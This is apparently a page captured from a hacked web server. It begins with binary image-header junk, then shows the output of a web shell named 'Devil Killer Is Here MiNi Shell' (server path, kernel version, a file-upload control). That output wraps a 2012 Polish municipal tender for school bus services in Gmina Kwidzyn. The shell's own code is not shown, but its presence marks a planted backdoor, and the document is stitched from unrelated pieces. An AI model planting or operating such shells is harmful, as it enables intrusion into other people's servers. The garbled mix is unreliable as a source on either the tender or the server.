JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120716/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120716/154731-N-2012.html

<p class="kh_header"><b>Kwidzyn: Dowóz uczniów z terenu gminy Kwidzyn do placówek oświatowych w roku szkolnym 2012/2013</b><br>
<b>Numer ogłoszenia: 154731 - 2012; data zamieszczenia: 16.07.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Kwidzyn , ul. Grudziądzka 30, 82-500 Kwidzyn, woj. pomorskie, tel. 055 261-41-51, faks 055 2792306.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.gminakwidzyn.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dowóz uczniów z terenu gminy Kwidzyn do placówek oświatowych w roku szkolnym 2012/2013.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest: Dowóz uczniów z terenu gminy Kwidzyn do placówek oświatowych w roku szkolnym 2012/2013.

Zakres obejmuje:
a)	Świadczenie usług przewozowych dzieci do następujących placówek oświatowych: Szkoły Podstawowej w Tychnowach i Niepublicznego Przedszkola Słoneczko w Marezie, Szkoły Podstawowej i Niepublicznego Przedszkola Tęcza w Rakowcu, Gimnazjum w Liczu, Specjalnego Ośrodka Szkolno-Wychowawczego w Kwidzynie, Szkoły Podstawowej w Janowie, Gimnazjum 
w Nowym Dworze, Szkoły Podstawowej i Przedszkola w Korzeniewie.
b)	Dowóz dzieci ma się odbywać następująco: rano dowiezienie do placówek i odwiezienie 
po zajęciach, po trasach i godzinach określonych przez Zamawiającego, również przez okres ferii zimowych.
c)	Do realizacji zamówienia wymagane jest 9 autobusów, w tym: 4 autobusy o pojemności 
nie mniejszej niż 55 osób każdy; 1 autobus o pojemności nie mniejszej niż 60 osób; 2 autobusy  o pojemności nie mniejszej niż 70 osób każdy; 1 autobus o pojemności nie mniejszej niż 75 osób; 
1 autobus z miejscami siedzącymi dla co najmniej 10 osób. 
d)	Ponadto wymagany jest dodatkowo transport zastępczy w ilości 2 autobusów o pojemności 
nie mniejszej niż 55 osób każdy.
e)	Przewidywana liczba dowożonych osób wraz z opiekunami: 815 miesięcznie - liczba osób może ulec zmianie.
f)	Zamawiający żąda, aby świadczona usługa dotycząca przewozu dzieci odbywała się
w oparciu o linie otwarte. 
g)	Linie otwarte muszą być prowadzone z pierwszeństwem przejazdu dla dzieci i młodzieży. 
h)	Wykonawca, który w wyniku przeprowadzonego postępowania będzie świadczył usługi przewozowe, przed rozpoczęciem świadczenia tych usług, zobowiązany będzie do uzyskania zezwolenia właściwego organu na wykonywanie regularnych przewozów osób w krajowym transporcie drogowym. 
i)	Kopię zezwolenia (potwierdzoną przez Wykonawcę za zgodność z oryginałem) na wykonywanie regularnych przewozów osób w krajowym transporcie drogowym Wykonawca będzie zobowiązany przekazać Zamawiającemu przed rozpoczęciem świadczenia usług.
j)	W przypadku, gdy opiekunowie dowożonych dzieci będą mieszkańcami Kwidzyna, wówczas Wykonawca zobowiązany będzie zaczynać i kończyć poszczególne trasy w miejscowości Kwidzyn, w miejscu wskazanym przez Zamawiającego. 

Planowane trasy przejazdu 

A.	Dowóz dzieci do Szkoły Podstawowej w Tychnowach  i Niepublicznego Przedszkola Słoneczko w Marezie w roku szkolnym 2012/2013

Dowóz na godz. 8:00
TRASA NR 1  (SPT + PM) (jeden autobus o pojemności nie mniejszej niż 55 osób)
Baldram - Nowa Wieś - szkoła Tychnowy - Tychnowy - Piekarniak - Kamionka - Brokowo - Dubiel -  Tychnowy - szkoła Tychnowy - Brachlewo - szkoła Tychnowy - Baldram  - Mareza - przedszkole Mareza
 
Liczba dowożonych osób do SP Tychnowy + P. Mareza:  87 ucz. + 1 opiekun

Odwóz
TRASA NR 1  (PM + SPT) (jeden autobus o pojemności nie mniejszej niż 55 osób)
5 dni w tygodniu o godz. 12:55 i o godz. 14:25

Mareza przedszkole, godz. 12:55 - Mareza - Baldram - Tychnowy szkoła - Brachlewo - Dubiel - Tychnowy - Brokowo - Kamionka - Piekarniak - Baldram - Nowa Wieś - wraca do szkoły Tychnowy, godz. 14:25 - Brachlewo - Dubiel - Tychnowy - Brokowo - Kamionka - Piekarniak - Baldram -  Nowa Wieś 

B.	 Dowóz dzieci do Szkoły Podstawowej i Niepublicznego Przedszkola Tęcza w Rakowcu, Gimnazjum w Liczu oraz do Specjalnego Ośrodka Szkolno-Wychowawczego w Kwidzynie w roku szkolnym 2012/2013

Dowóz na godz. 8:00

TRASA NR 1 (GimL + SPR + PR + SOSW K-n) (jeden autobus o pojemności nie mniejszej niż 55 osób)

Tychnowy kościół - Tychnowy szkoła- Tychnowy przystanek - Brachlewo CPN - Brachlewo osiedle - Brachlewo jezioro - Brachlewo krzyżówka - Dubiel PKS - Dubiel - skrzyżowanie Kamionka/Brokowo - Brokowo - Ośno - Licze szkoła - Ośno -  Licze PKP - Licze szkoła - Rakowiec szkoła - Rakowiec przedszkole - Mały Rakowiec - Kwidzyn SOSW

TRASA NR 2 (GimL + SPR + PR) (jeden autobus o pojemności nie mniejszej niż 55 osób)

Baldram Mały (Kamionka) - Kwidzyn, ul. Warszawska - Górki - Rakowice przystanek - Rakowice wieś - Rakowiec przedszkole - Rakowiec szkoła - Licze szkoła - Licze kolonia - Licze na żądanie - Bronno - Licze szkoła - Rakowiec przedszkole - Rakowiec szkoła 

TRASA NR 3 (GimL + SPR + PR) (jeden autobus o pojemności nie mniejszej niż 60 osób)

Pawlice - Pawlice las - Rakowiec przedszkole - Rakowiec szkoła - Rakowiec CPN - Licze szkoła  - Gilwa Mała  - Licze szkoła - Rakowiec CPN - Rakowiec przedszkole - Rakowiec szkoła
 
Liczba dowożonych uczniów do SP Rakowiec + P. Rakowiec + Gim Licze + SOSW Kwidzyn: 315 ucz. + 3 opiekunów

Odwóz 
TRASA NR 1  (GimL + SPR + PR) (jeden autobus o pojemności nie mniejszej niż 55 osób)

5 dni w tygodniu o godz. 12:50 i o godz. 14:30

Rakowiec przedszkole, godz. 12:50 - Rakowiec szkoła - Licze szkoła - Licze kolonia - Licze na żądanie - Bronno - Licze szkoła - Rakowiec przedszkole - Rakowiec szkoła - Pawlice - Pawlice las - Rakowice przystanek - Rakowice wieś - Rakowiec przedszkole - wraca do szkoły Rakowiec, godz. 14:30 - Licze szkoła - Licze kolonia - Licze na żądanie - Bronno - Licze szkoła - Gilwa Mała - Licze szkoła - Rakowiec przedszkole - Rakowiec szkoła - Pawlice - Pawlice las - Rakowice wieś - Rakowice przystanek - Górki - Kwidzyn, ul. Piastowska - Baldram Mały (Kamionka) 

TRASA NR 2  (GimL + SPR + PR) (jeden autobus o pojemności nie mniejszej 55 osób)
5 dni w tygodniu o godz. 12:50 i o godz. 14:30

Rakowiec przedszkole, godz. 12:50 - Rakowiec szkoła - Licze szkoła - Licze PKP - Ośno - Licze szkoła - Ośno - Dubiel - Brachlewo osiedle - Brachlewo CPN - Tychnowy szkoła - Tychnowy kościół - Baldram Duży - Kwidzyn, ul. Warszawska - Górki - wraca do szkoły Rakowiec, godz. 14:30 - Licze szkoła - Licze PKP - Ośno - Licze szkoła - Ośno - Brokowo - Kamionka - Dubiel - Brachlewo osiedle - Brachlewo CPN - Tychnowy - Baldram Duży - Kwidzyn

C.	Dowóz dzieci do Szkoły Podstawowej w Janowie i Gimnazjum w Nowym Dworze, do Szkoły Podstawowej i Przedszkola w Korzeniewie oraz do Niepublicznego Przedszkola Słoneczko
w Marezie w roku szkolnym 2012/2013

Dowóz do szkoły w Janowie na godz.  7:45;  do szkoły i przedszkola w Korzeniewie na godz. 8:00; 
do szkoły w Nowym Dworze na godz. 8:15 

TRASA NR 1  (SPJ + GimND + SPK + PK) (jeden autobus o pojemności nie mniejszej niż 70 osób)

Gurcz - Pastwa działki - Pastwa - Janowo - Janowo szkoła - Gniewskie Pole (za wałem) - Lipianki  - Korzeniewo przedszkole - Korzeniewo szkoła - Obory - Nowy Dwór szkoła

TRASA NR 2  (SPJ + GimND + SPK + PK) (jeden autobus o pojemności nie mniejszej niż 55 osób)

Podzamcze - Gurcz kolonia - Janowo szkoła - Pastwa działki - Pastwa - Gniewskie Pole (przed wałem) - Lipianki - Korzeniewo osiedle - Korzeniewo przedszkole - Korzeniewo szkoła - Korzeniewo - Mareza PGR - Mareza sklep - Nowy Dwór POM - Nowy Dwór  szkoła

TRASA NR 3  (SPJ + SPK + PK + GimND + PM) (jeden autobus o pojemności nie mniejszej niż 75 osób)

Pastwa - Szkaradowo  - Jarzębina - Rudniki - Szałwinek - Janowo  - Janowo szkoła  - Gurcz  - Podzamcze - Mareza mosty - Mareza Przedszkole - Mareza PGR - Korzeniewo szkoła - Korzeniewo przedszkole - Nowy Dwór szkoła

TRASA NR 4 (SPK + GimND + PK) (jeden autobus o pojemności nie mniejszej niż 70 osób)
Rozpędziny - Kaniczki remiza - Kaniczki przystanek - Grabowo - Grabówko - Nowy Dwór szkoła - Nowy Dwór przystanek - Nowy Dwór POM - Obory - Korzeniewo szkoła - Korzeniewo  przedszkole

Liczba dowożonych uczniów do SP Janowo + SP Korzeniewo + P. Korzeniewo + P. Mareza + Gim Nowy Dwór:  395 ucz. + 4 opiekunów

Odwóz 

TRASA NR 1  (GimND) (jeden autobus o pojemności nie mniejszej niż 55 osób)

4 dni w tygodniu (poniedziałek, wtorek środa, czwartek) o godz. 14:40
1 dzień w tygodniu (piątek) o godz. 13:45

Nowy Dwór szkoła - Grabówko - Grabowo - Kaniczki - wraca do szkoły Nowy Dwór - Mareza PGR - Korzeniewo - Lipianki - Gniewskie Pole (przed wałem) - Pastwa - Gniewskie Pole (za wałem)

TRASA NR 2 (GimND) (jeden autobus o pojemności nie mniejszej niż 55 osób)

4 dni w tygodniu (poniedziałek, wtorek środa, czwartek) o godz. 14:40
1 dzień w tygodniu (piątek) o godz. 13:45

Nowy Dwór szkoła - Nowy Dwór - Obory - Mareza sklep  - Rozpędziny - wraca do szkoły Nowy Dwór - Mareza mosty - Podzamcze - Gurcz - Janowo - Szałwinek - Szkaradowo - Rudniki - Jarzębina 

TRASA NR 3 (SPK + PK + PM) (jeden autobus o pojemności nie mniejszej niż 65 osób)

4 dni w tygodniu (poniedziałek, wtorek, środa, czwartek) o godz. 12:40; 13:10; 15:10; 15:45
1 dzień w tygodniu (piątek) o godz. 12:40; 13:10; 14:20; 14:50

Korzeniewo szkoła, godz. 12:40 - Lipianki - Gniewskie Pole(przed wałem) - Pastwa - Gniewskie Pole 
(za wałem) - wraca do szkoły Korzeniewo, godz. 13:10 - Mareza przedszkole - Mareza w stronę Podzamcza - Nowy Dwór - Grabówko - Grabowo - Kaniczki - wraca do szkoły Korzeniewo, godz. 14:20 / 15:10 - Lipianki - Gniewskie Pole (przed wałem) - Pastwa - Gniewskie Pole (za wałem) - wraca do szkoły Korzeniewo, godz. 14:50 / 15:45 - Mareza - Podzamcze - Mareza - Nowy Dwór - Grabówko - Grabowo - Kaniczki

TRASA NR 4   (SPJ) (jeden autobus o pojemności nie mniejszej niż 60 osób)

5 dni w tygodniu o godz. 12:45

Janowo szkoła - Pastwa - Gurcz - Podzamcze - wraca do szkoły Janowo - Szałwinek - Jarzębina -Szkaradowo - wraca do szkoły Janowo - Pastwa - Gurcz - Podzamcze

D.	Dowóz dzieci do Szkoły Podstawowej i Przedszkola w Korzeniewie oraz do Niepublicznego Przedszkola Słoneczko w Marezie w roku szkolnym 2012/2013

Dowóz na godz. 8:00 

TRASA NR 1  (PM +  SPK + PK) (jeden autobus z miejscami siedzącymi dla co najmniej 10 osób)

Rozpędziny - Mareza przedszkole - Korzeniewo szkoła - Korzeniewo przedszkole 

Liczba dowożonych uczniów do SP Korzeniewo + P. Korzeniewo + P. Mareza:  9 ucz. + 1 opiekun

Odwóz 
TRASA NR 1 (SPK + PK + PM) (jeden autobus z miejscami siedzącymi dla co najmniej 10 osób)

4 dni w tygodniu (poniedziałek, wtorek, środa, czwartek) o godz. 12:50; 15:10
1 dzień w tygodniu (piątek) o godz. 12:50; 14:20

Korzeniewo szkoła, godz. 12:50 - Korzeniewo przedszkole - Mareza przedszkole - Rozpędziny - Korzeniewo szkoła godz. 14:20 / 15:10 - Rozpędziny.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 60.00.00.00-8, 60.10.00.00-9, 60.13.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wysokość wadium w niniejszym postępowaniu wynosi 10 000 zł</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca spełnia w/w warunek, jeżeli wykaże, iż posiada aktualną licencję na przewozy osób autobusami wydaną przez Starostę właściwego ze względu na siedzibę podmiotu, zgodnie z ustawą o transporcie drogowym (Dz. U. z 2007 r. Nr 125, poz. 874 ze zm.)</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca spełnia w/w warunek, jeżeli wykaże, iż w ciągu ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest 
krótszy - w tym okresie, wykonał co najmniej dwie usługi odpowiadające swoim rodzajem przedmiotowi zamówienia o łącznej wartości 500 000,00 zł brutto.
W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia warunek ten może być spełniony łącznie</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca spełnia w/w warunek, jeżeli wykaże, ze dysponuje 9 autobusami, w tym 4 autobusami o pojemności nie mniejszej niż 55 osób każdy; 1 autobusem 
o pojemności nie mniejszej niż 60 osób; 2 autobusami o pojemności nie mniejszej niż 70 osób każdy; 1 autobusem o pojemności nie mniejszej niż 75 osób; 1 autobusem z miejscami siedzącymi dla co najmniej 10 osób. Ponadto wymagany jest dodatkowo transport zastępczy w ilości 2 autobusów o pojemności nie mniejszej niż 55 osób każdy</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca spełnia w/w warunek jeżeli wykaże, iż jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia, w wysokości nie mniejszej niż 100 000,00 zł</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zamawiający dopuszcza zmianę treści umowy w zakresie zmiany tras, godzin przejazdów oraz liczby dowożonych osób w przypadkach:
1)	wystąpienia niesprzyjających warunków atmosferycznych uniemożliwiających realizację przedmiotu zamówienia,
2)	działania siły wyższej,
3)	przyjęcia nowych uczniów do placówek oświatowych,
4)	skreślenia dziecka z listy uczniów danej placówki oświatowej,
5)	zmiany w szkolnym planie nauczania,
6)	likwidacji placówki oświatowej.
2.	Zamawiający dopuszcza zmianę ceny za świadczenie usług w przypadku zmiany ustawowej stawki podatku od towarów i usług.
3.	Poza innymi przypadkami określonymi w Umowie, zmiany do Umowy będą mogły być wprowadzane w związku z zaistnieniem okoliczności, których wystąpienia Zamawiający ani Wykonawca nie przewidywali w chwili zawierania Umowy, a które mają wpływ na prawidłowe wykonanie przewidzianych w umowie.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.gminakwidzyn.pl<br>
